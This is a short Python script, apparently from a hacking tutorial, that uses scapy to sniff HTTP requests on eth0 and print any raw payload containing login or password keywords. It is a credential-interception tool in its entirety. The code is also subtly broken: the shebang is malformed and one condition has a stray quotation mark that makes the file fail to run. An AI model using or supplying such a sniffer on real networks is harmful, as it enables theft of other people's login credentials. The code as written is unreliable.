#!usr/bin/env python

import scapy.all as scapy
from scapy.layers import http

def sniff(interface):
    scapy.sniff(iface=interface,store=False,prn=process_sniffed_packet)

def process_sniffed_packet(packet):

    if packet.haslayer(http.HTTPRequest):
       if packet.haslayer(scapy.Raw):  #Raw is the layer that contains username and password
          load = packet[scapy.Raw].load     #load is the field that contains username and password
          keywords = ["username","user","login","password","pass"]
          for keyword in keywords:
              if keyword in load"
                 print(load)
                 break
       

sniff("eth0") 